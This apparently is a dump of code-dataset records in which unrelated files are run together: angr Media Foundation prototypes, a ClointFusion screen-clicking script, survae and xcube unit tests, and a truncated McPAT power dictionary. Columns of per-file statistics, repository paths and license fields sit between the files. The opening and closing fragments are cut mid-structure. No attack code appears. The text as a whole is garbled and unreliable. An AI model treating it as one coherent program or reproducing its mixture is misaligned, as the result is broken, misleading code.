'MFCopyImage': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pDest", "lDestStride", "pSrc", "lSrcStride", "dwWidthInBytes", "dwLines"]),
#
'MFConvertFromFP16Array': SimTypeFunction([SimTypePointer(SimTypeFloat(size=32), label="LPArray", offset=0), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pDest", "pSrc", "dwCount"]),
#
'MFConvertToFP16Array': SimTypeFunction([SimTypePointer(SimTypeShort(signed=False, label="UInt16"), label="LPArray", offset=0), SimTypePointer(SimTypeFloat(size=32), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pDest", "pSrc", "dwCount"]),
#
'MFCreate2DMediaBuffer': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWidth", "dwHeight", "dwFourCC", "fBottomUp", "ppBuffer"]),
#
'MFCreateMediaBufferFromMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypeLongLong(signed=True, label="Int64"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMediaType", "llDuration", "dwMinLength", "dwMinAlignment", "ppBuffer"]),
#
'MFCreateCollection': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFCollection"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppIMFCollection"]),
#
'MFHeapAlloc': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=False, label="EAllocationType")], SimTypePointer(SimTypeBottom(label="Void"), offset=0), arg_names=["nSize", "dwFlags", "pszFile", "line", "eat"]),
#
'MFHeapFree': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeBottom(label="Void"), arg_names=["pv"]),
#
'MFllMulDiv': SimTypeFunction([SimTypeLongLong(signed=True, label="Int64"), SimTypeLongLong(signed=True, label="Int64"), SimTypeLongLong(signed=True, label="Int64"), SimTypeLongLong(signed=True, label="Int64")], SimTypeLongLong(signed=True, label="Int64"), arg_names=["a", "b", "c", "d"]),
#
'MFGetContentProtectionSystemCLSID': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeBottom(label="Guid"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["guidProtectionSystemID", "pclsid"]),
#
'MFCombineSamples': SimTypeFunction([SimTypeBottom(label="IMFSample"), SimTypeBottom(label="IMFSample"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pSample", "pSampleToAdd", "dwMaxMergedDurationInMS", "pMerged"]),
#
'MFSplitSample': SimTypeFunction([SimTypeBottom(label="IMFSample"), SimTypePointer(SimTypeBottom(label="IMFSample"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pSample", "pOutputSamples", "dwOutputSampleMaxCount", "pdwOutputSampleCount"]),
}
lib.set_prototypes(prototypes)
| 360.151613
| 8,410
| 0.736276
| 11,462
| 111,647
| 7.148665
| 0.062642
| 0.136884
| 0.104079
| 0.134223
| 0.897166
| 0.890966
| 0.876297
| 0.863397
| 0.850082
| 0.833398
| 0
| 0.020867
| 0.071135
| 111,647
| 309
| 8,411
| 361.317152
| 0.76924
| 0.000251
| 0
| 0
| 0
| 0
| 0.261468
| 0.042029
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.050633
| 0
| 0.050633
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1263a63dc231b8ecbb32bb0b79ff0d5017758d64
| 84
|
py
|
Python
|
tests/__init__.py
|
s-leroux/sql-moins
|
beb65300e4602a0d1dcaccf534df39c071060d40
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
s-leroux/sql-moins
|
beb65300e4602a0d1dcaccf534df39c071060d40
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
s-leroux/sql-moins
|
beb65300e4602a0d1dcaccf534df39c071060d40
|
[
"Apache-2.0"
] | null | null | null |
from tests.parser import *
from tests.formatter import *
from tests.utils import *
| 16.8
| 29
| 0.77381
| 12
| 84
| 5.416667
| 0.5
| 0.415385
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.154762
| 84
| 4
| 30
| 21
| 0.915493
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
89dae401f8334c13497ff1b437626cfde768def7
| 2,021
|
py
|
Python
|
Hackathon 4.0_2021-01-08_07-22-55.py
|
ClointFusion-Community/CFC-Projects
|
c6381738ade07e6e8979bbae37400ec2b4e626c5
|
[
"MIT"
] | null | null | null |
Hackathon 4.0_2021-01-08_07-22-55.py
|
ClointFusion-Community/CFC-Projects
|
c6381738ade07e6e8979bbae37400ec2b4e626c5
|
[
"MIT"
] | null | null | null |
Hackathon 4.0_2021-01-08_07-22-55.py
|
ClointFusion-Community/CFC-Projects
|
c6381738ade07e6e8979bbae37400ec2b4e626c5
|
[
"MIT"
] | null | null | null |
# This code is generated automatically by ClointFusion BOT Builder Tool.
import ClointFusion as cf
import time
cf.window_show_desktop()
cf.mouse_click(int(cf.pg.size()[0]/2),int(cf.pg.size()[1]/2))
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\mrmay\AppData\Local\Temp\cf_log_5fa2gg4s_generator\Images\Snips\1--1788_368.png',conf=0.7, wait=12),left_or_right='left', single_double_triple = 'single')
except:
cf.mouse_click(1788,368,left_or_right='left', single_double_triple = 'single')
time.sleep(2)
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\mrmay\AppData\Local\Temp\cf_log_5fa2gg4s_generator\Images\Snips\2--246_938.png',conf=0.7, wait=10),left_or_right='left', single_double_triple = 'single')
except:
cf.mouse_click(246,938,left_or_right='left', single_double_triple = 'single')
time.sleep(0)
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\mrmay\AppData\Local\Temp\cf_log_5fa2gg4s_generator\Images\Snips\3--246_938.png',conf=0.7, wait=13),left_or_right='left', single_double_triple = 'double')
except:
cf.mouse_click(246,938,left_or_right='left', single_double_triple = 'double')
time.sleep(3)
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\mrmay\AppData\Local\Temp\cf_log_5fa2gg4s_generator\Images\Snips\4-NewTabGoogleChrome-385_77.png',conf=0.7, wait=11),left_or_right='left', single_double_triple = 'single')
except:
cf.mouse_click(385,77,left_or_right='left', single_double_triple = 'single')
time.sleep(1)
cf.key_write_enter('modi')
time.sleep(0)
cf.key_press('enter')
time.sleep(3)
try:
cf.mouse_click(*cf.mouse_search_snip_return_coordinates_x_y(r'C:\Users\mrmay\AppData\Local\Temp\cf_log_5fa2gg4s_generator\Images\Snips\5-modiGoogleSearchGoogleChrome-1905_57.png',conf=0.7, wait=10),left_or_right='left', single_double_triple = 'single')
except:
cf.mouse_click(1905,57,left_or_right='left', single_double_triple = 'single')
time.sleep(0)
| 48.119048
| 256
| 0.784265
| 347
| 2,021
| 4.262248
| 0.224784
| 0.075727
| 0.089249
| 0.10142
| 0.806626
| 0.789047
| 0.789047
| 0.772143
| 0.741717
| 0.741717
| 0
| 0.058792
| 0.065809
| 2,021
| 41
| 257
| 49.292683
| 0.724576
| 0.034636
| 0
| 0.454545
| 1
| 0.151515
| 0.302719
| 0.246793
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.060606
| 0
| 0.060606
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
89e1e0fdcc58fa3523c28ea0543829f7666a6db0
| 5,597
|
py
|
Python
|
survae/tests/transforms/bijections/conditional/coupling/coupling_mixtures.py
|
alisiahkoohi/survae_flows
|
e1747b05524c7ab540a211ed360ab3e67bc3e96d
|
[
"MIT"
] | 262
|
2020-07-05T20:57:44.000Z
|
2022-03-28T02:24:43.000Z
|
survae/tests/transforms/bijections/conditional/coupling/coupling_mixtures.py
|
alisiahkoohi/survae_flows
|
e1747b05524c7ab540a211ed360ab3e67bc3e96d
|
[
"MIT"
] | 17
|
2020-08-15T05:43:34.000Z
|
2022-01-31T12:24:21.000Z
|
survae/tests/transforms/bijections/conditional/coupling/coupling_mixtures.py
|
alisiahkoohi/survae_flows
|
e1747b05524c7ab540a211ed360ab3e67bc3e96d
|
[
"MIT"
] | 35
|
2020-08-24T06:55:37.000Z
|
2022-02-11T05:17:58.000Z
|
import numpy as np
import torch
import torch.nn as nn
import torchtestcase
import unittest
from survae.transforms.bijections.conditional.coupling import *
from survae.nn.layers import ElementwiseParams, ElementwiseParams2d, scale_fn
from survae.tests.transforms.bijections.conditional import ConditionalBijectionTest
class ConditionalGaussianMixtureCouplingBijectionTest(ConditionalBijectionTest):
def test_bijection_is_well_behaved(self):
num_mix = 8
batch_size = 10
elementwise_params = 3 * num_mix
self.eps = 5e-5
for shape in [(6,),
(6,4,4)]:
for num_condition in [None, 1]:
with self.subTest(shape=shape, num_condition=num_condition):
x = torch.randn(batch_size, *shape)
context = torch.randn(batch_size, *shape)
if num_condition is None:
if len(shape) == 1: net = nn.Sequential(nn.Linear(3+6,3*elementwise_params), ElementwiseParams(elementwise_params))
if len(shape) == 3: net = nn.Sequential(nn.Conv2d(3+6,3*elementwise_params, kernel_size=3, padding=1), ElementwiseParams2d(elementwise_params))
else:
if len(shape) == 1: net = nn.Sequential(nn.Linear(1+6,5*elementwise_params), ElementwiseParams(elementwise_params))
if len(shape) == 3: net = nn.Sequential(nn.Conv2d(1+6,5*elementwise_params, kernel_size=3, padding=1), ElementwiseParams2d(elementwise_params))
bijection = ConditionalGaussianMixtureCouplingBijection(net, num_mixtures=num_mix, num_condition=num_condition)
self.assert_bijection_is_well_behaved(bijection, x, context, z_shape=(batch_size, *shape))
z, _ = bijection.forward(x, context=context)
if num_condition is None:
self.assertEqual(x[:,:3], z[:,:3])
else:
self.assertEqual(x[:,:1], z[:,:1])
class ConditionalLogisticMixtureCouplingBijectionTest(ConditionalBijectionTest):
def test_bijection_is_well_behaved(self):
num_mix = 8
batch_size = 10
elementwise_params = 3 * num_mix
self.eps = 5e-5
for shape in [(6,),
(6,4,4)]:
for num_condition in [None, 1]:
with self.subTest(shape=shape, num_condition=num_condition):
x = torch.randn(batch_size, *shape)
context = torch.randn(batch_size, *shape)
if num_condition is None:
if len(shape) == 1: net = nn.Sequential(nn.Linear(3+6,3*elementwise_params), ElementwiseParams(elementwise_params))
if len(shape) == 3: net = nn.Sequential(nn.Conv2d(3+6,3*elementwise_params, kernel_size=3, padding=1), ElementwiseParams2d(elementwise_params))
else:
if len(shape) == 1: net = nn.Sequential(nn.Linear(1+6,5*elementwise_params), ElementwiseParams(elementwise_params))
if len(shape) == 3: net = nn.Sequential(nn.Conv2d(1+6,5*elementwise_params, kernel_size=3, padding=1), ElementwiseParams2d(elementwise_params))
bijection = ConditionalLogisticMixtureCouplingBijection(net, num_mixtures=num_mix, num_condition=num_condition)
self.assert_bijection_is_well_behaved(bijection, x, context, z_shape=(batch_size, *shape))
z, _ = bijection.forward(x, context=context)
if num_condition is None:
self.assertEqual(x[:,:3], z[:,:3])
else:
self.assertEqual(x[:,:1], z[:,:1])
class ConditionalCensoredLogisticMixtureCouplingBijectionTest(ConditionalBijectionTest):
def test_bijection_is_well_behaved(self):
num_bins = 16
num_mix = 8
batch_size = 10
elementwise_params = 3 * num_mix
self.eps = 1e-6
for shape in [(6,),
(6,4,4)]:
for num_condition in [None, 1]:
with self.subTest(shape=shape, num_condition=num_condition):
x = torch.rand(batch_size, *shape)
context = torch.randn(batch_size, *shape)
if num_condition is None:
if len(shape) == 1: net = nn.Sequential(nn.Linear(3+6,3*elementwise_params), ElementwiseParams(elementwise_params))
if len(shape) == 3: net = nn.Sequential(nn.Conv2d(3+6,3*elementwise_params, kernel_size=3, padding=1), ElementwiseParams2d(elementwise_params))
else:
if len(shape) == 1: net = nn.Sequential(nn.Linear(1+6,5*elementwise_params), ElementwiseParams(elementwise_params))
if len(shape) == 3: net = nn.Sequential(nn.Conv2d(1+6,5*elementwise_params, kernel_size=3, padding=1), ElementwiseParams2d(elementwise_params))
bijection = ConditionalCensoredLogisticMixtureCouplingBijection(net, num_mixtures=num_mix, num_bins=num_bins, num_condition=num_condition)
self.assert_bijection_is_well_behaved(bijection, x, context, z_shape=(batch_size, *shape))
z, _ = bijection.forward(x, context=context)
if num_condition is None:
self.assertEqual(x[:,:3], z[:,:3])
else:
self.assertEqual(x[:,:1], z[:,:1])
if __name__ == '__main__':
unittest.main()
| 55.415842
| 167
| 0.60586
| 627
| 5,597
| 5.216906
| 0.127592
| 0.140324
| 0.036686
| 0.062366
| 0.813207
| 0.813207
| 0.806175
| 0.806175
| 0.806175
| 0.787832
| 0
| 0.030242
| 0.291049
| 5,597
| 100
| 168
| 55.97
| 0.794103
| 0
| 0
| 0.77907
| 0
| 0
| 0.001429
| 0
| 0
| 0
| 0
| 0
| 0.104651
| 1
| 0.034884
| false
| 0
| 0.093023
| 0
| 0.162791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d648d151b563996d1ca1c9b18232f0f106c64aea
| 14,079
|
py
|
Python
|
test/webapi/controllers/test_time_series.py
|
dzelge/xcube
|
1e5049a227df4a50435d9aac6aacf2bcbaa3e2dd
|
[
"MIT"
] | null | null | null |
test/webapi/controllers/test_time_series.py
|
dzelge/xcube
|
1e5049a227df4a50435d9aac6aacf2bcbaa3e2dd
|
[
"MIT"
] | null | null | null |
test/webapi/controllers/test_time_series.py
|
dzelge/xcube
|
1e5049a227df4a50435d9aac6aacf2bcbaa3e2dd
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
from xcube.webapi.controllers.time_series import get_time_series_info, get_time_series_for_point, \
get_time_series_for_geometry, get_time_series_for_geometry_collection
from ..helpers import new_test_service_context
class TimeSeriesControllerTest(unittest.TestCase):
def test_get_time_series_for_point_invalid_lat_and_lon(self):
ctx = new_test_service_context()
time_series = get_time_series_for_point(ctx, 'demo', 'conc_tsm',
lon=-150.0, lat=-30.0)
expected_dict = {'results': []}
self.assertEqual(expected_dict, time_series)
def test_get_time_series_for_point(self):
ctx = new_test_service_context()
time_series = get_time_series_for_point(ctx, 'demo', 'conc_tsm',
lon=2.1, lat=51.4,
start_date=np.datetime64('2017-01-15'),
end_date=np.datetime64('2017-01-29'))
expected_dict = {'results': [{'date': '2017-01-16T10:09:22Z',
'result': {'average': 3.534773588180542,
'totalCount': 1,
'validCount': 1}},
{'date': '2017-01-25T09:35:51Z',
'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
{'date': '2017-01-26T10:50:17Z',
'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
{'date': '2017-01-28T09:58:11Z',
'result': {'average': 20.12085723876953,
'totalCount': 1,
'validCount': 1}}]}
self.assertEqual(expected_dict, time_series)
def test_get_time_series_for_point_one_valid(self):
ctx = new_test_service_context()
time_series = get_time_series_for_point(ctx, 'demo', 'conc_tsm',
lon=2.1, lat=51.4,
start_date=np.datetime64('2017-01-15'),
end_date=np.datetime64('2017-01-29'),
max_valids=1)
expected_dict = {'results': [{'date': '2017-01-16T10:09:22Z',
'result': {'average': 3.534773588180542,
'totalCount': 1,
'validCount': 1}}]}
self.assertEqual(expected_dict, time_series)
def test_get_time_series_for_point_only_valids(self):
ctx = new_test_service_context()
time_series = get_time_series_for_point(ctx, 'demo', 'conc_tsm',
lon=2.1, lat=51.4,
start_date=np.datetime64('2017-01-15'),
end_date=np.datetime64('2017-01-29'),
max_valids=-1)
expected_dict = {'results': [{'date': '2017-01-16T10:09:22Z',
'result': {'average': 3.534773588180542,
'totalCount': 1,
'validCount': 1}},
{'date': '2017-01-28T09:58:11Z',
'result': {'average': 20.12085723876953,
'totalCount': 1,
'validCount': 1}}]}
self.assertEqual(expected_dict, time_series)
def test_get_time_series_for_point_with_uncertainty(self):
ctx = new_test_service_context()
time_series = get_time_series_for_point(ctx, 'demo-1w', 'conc_tsm',
lon=2.1, lat=51.4,
start_date=np.datetime64('2017-01-15'),
end_date=np.datetime64('2017-01-29'))
expected_dict = {'results': [{'date': '2017-01-22T00:00:00Z',
'result': {'average': 3.534773588180542,
'uncertainty': 0.0,
'totalCount': 1,
'validCount': 1}},
{'date': '2017-01-29T00:00:00Z',
'result': {'average': 20.12085723876953,
'uncertainty': 0.0,
'totalCount': 1,
'validCount': 1}}]}
self.assertEqual(expected_dict, time_series)
def test_get_time_series_for_geometry_point(self):
ctx = new_test_service_context()
time_series = get_time_series_for_geometry(ctx, 'demo', 'conc_tsm',
dict(type="Point", coordinates=[2.1, 51.4]),
start_date=np.datetime64('2017-01-15'),
end_date=np.datetime64('2017-01-29'))
expected_dict = {'results': [{'date': '2017-01-16T10:09:22Z',
'result': {'average': 3.534773588180542,
'totalCount': 1,
'validCount': 1}},
{'date': '2017-01-25T09:35:51Z',
'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
{'date': '2017-01-26T10:50:17Z',
'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
{'date': '2017-01-28T09:58:11Z',
'result': {'average': 20.12085723876953,
'totalCount': 1,
'validCount': 1}}]}
self.assertEqual(expected_dict, time_series)
def test_get_time_series_for_geometry_polygon(self):
ctx = new_test_service_context()
time_series = get_time_series_for_geometry(ctx, 'demo', 'conc_tsm',
dict(type="Polygon", coordinates=[[
[1., 51.], [2., 51.], [2., 52.], [1., 52.], [1., 51.]
]]))
expected_dict = {'results': [{'date': '2017-01-16T10:09:22Z',
'result': {'average': 56.0228561816751,
'totalCount': 1,
'validCount': 122738}},
{'date': '2017-01-25T09:35:51Z',
'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
{'date': '2017-01-26T10:50:17Z',
'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
{'date': '2017-01-28T09:58:11Z',
'result': {'average': 49.71656646340396,
'totalCount': 1,
'validCount': 132716}},
{'date': '2017-01-30T10:46:34Z',
'result': {'average': None, 'totalCount': 1, 'validCount': 0}}]}
self.assertEqual(expected_dict, time_series)
def test_get_time_series_for_geometry_polygon_one_valid(self):
ctx = new_test_service_context()
time_series = get_time_series_for_geometry(ctx, 'demo', 'conc_tsm',
dict(type="Polygon", coordinates=[[
[1., 51.], [2., 51.], [2., 52.], [1., 52.], [1., 51.]
]]), max_valids=1)
expected_dict = {'results': [{'date': '2017-01-16T10:09:22Z',
'result': {'average': 56.0228561816751,
'totalCount': 1,
'validCount': 122738}}]}
self.assertEqual(expected_dict, time_series)
def test_get_time_series_for_geometries_incl_point(self):
ctx = new_test_service_context()
time_series = get_time_series_for_geometry_collection(ctx,
'demo', 'conc_tsm',
dict(type="GeometryCollection",
geometries=[
dict(type="Point", coordinates=[2.1, 51.4])]),
start_date=np.datetime64('2017-01-15'),
end_date=np.datetime64('2017-01-29'))
expected_dict = {'results': [[{'date': '2017-01-16T10:09:22Z',
'result': {'average': 3.534773588180542,
'totalCount': 1,
'validCount': 1}},
{'date': '2017-01-25T09:35:51Z',
'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
{'date': '2017-01-26T10:50:17Z',
'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
{'date': '2017-01-28T09:58:11Z',
'result': {'average': 20.12085723876953,
'totalCount': 1,
'validCount': 1}}]]}
self.assertEqual(expected_dict, time_series)
def test_get_time_series_for_geometries_incl_polygon(self):
ctx = new_test_service_context()
time_series = get_time_series_for_geometry_collection(ctx,
'demo', 'conc_tsm',
dict(type="GeometryCollection",
geometries=[dict(type="Polygon", coordinates=[[
[1., 51.], [2., 51.], [2., 52.], [1., 52.],
[1., 51.]
]])]))
expected_dict = {'results': [[{'date': '2017-01-16T10:09:22Z',
'result': {'average': 56.0228561816751,
'totalCount': 1,
'validCount': 122738}},
{'date': '2017-01-25T09:35:51Z',
'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
{'date': '2017-01-26T10:50:17Z',
'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
{'date': '2017-01-28T09:58:11Z',
'result': {'average': 49.71656646340396,
'totalCount': 1,
'validCount': 132716}},
{'date': '2017-01-30T10:46:34Z',
'result': {'average': None, 'totalCount': 1, 'validCount': 0}}]]}
self.assertEqual(expected_dict, time_series)
def test_get_time_series_info(self):
self.maxDiff = None
ctx = new_test_service_context()
info = get_time_series_info(ctx)
expected_dict = self._get_expected_info_dict()
self.assertEqual(expected_dict, info)
@staticmethod
def _get_expected_info_dict():
expected_dict = {'layers': []}
bounds = {'xmin': 0.0, 'ymin': 50.0,
'xmax': 5.0, 'ymax': 52.5}
demo_times = ['2017-01-16T10:09:22Z',
'2017-01-25T09:35:51Z',
'2017-01-26T10:50:17Z',
'2017-01-28T09:58:11Z',
'2017-01-30T10:46:34Z']
demo_variables = ['c2rcc_flags',
'conc_chl',
'conc_tsm',
'kd489',
'quality_flags']
for demo_variable in demo_variables:
dict_variable = {'name': f'demo.{demo_variable}', 'dates': demo_times, 'bounds': bounds}
expected_dict['layers'].append(dict_variable)
demo1w_times = ['2017-01-22T00:00:00Z', '2017-01-29T00:00:00Z', '2017-02-05T00:00:00Z']
for demo_variable in demo_variables:
dict_variable = {'name': f'demo-1w.{demo_variable}', 'dates': demo1w_times, 'bounds': bounds}
expected_dict['layers'].append(dict_variable)
dict_variable = {'name': f'demo-1w.{demo_variable}_stdev', 'dates': demo1w_times, 'bounds': bounds}
expected_dict['layers'].append(dict_variable)
return expected_dict
| 62.29646
| 117
| 0.40017
| 1,153
| 14,079
| 4.647875
| 0.112749
| 0.087703
| 0.052249
| 0.06867
| 0.882068
| 0.844561
| 0.838216
| 0.822168
| 0.813025
| 0.803135
| 0
| 0.146626
| 0.483131
| 14,079
| 225
| 118
| 62.573333
| 0.589803
| 0
| 0
| 0.70098
| 0
| 0
| 0.167626
| 0.003693
| 0
| 0
| 0
| 0
| 0.053922
| 1
| 0.058824
| false
| 0
| 0.019608
| 0
| 0.088235
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3d757831ced0c808c54a19099c1901ac199f8e6
| 68,660
|
py
|
Python
|
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_leslie3d/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_leslie3d/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_leslie3d/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.064476,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.253331,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.335857,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.188561,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.32652,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.187268,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.70235,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.134893,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.73557,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0634506,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00683549,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
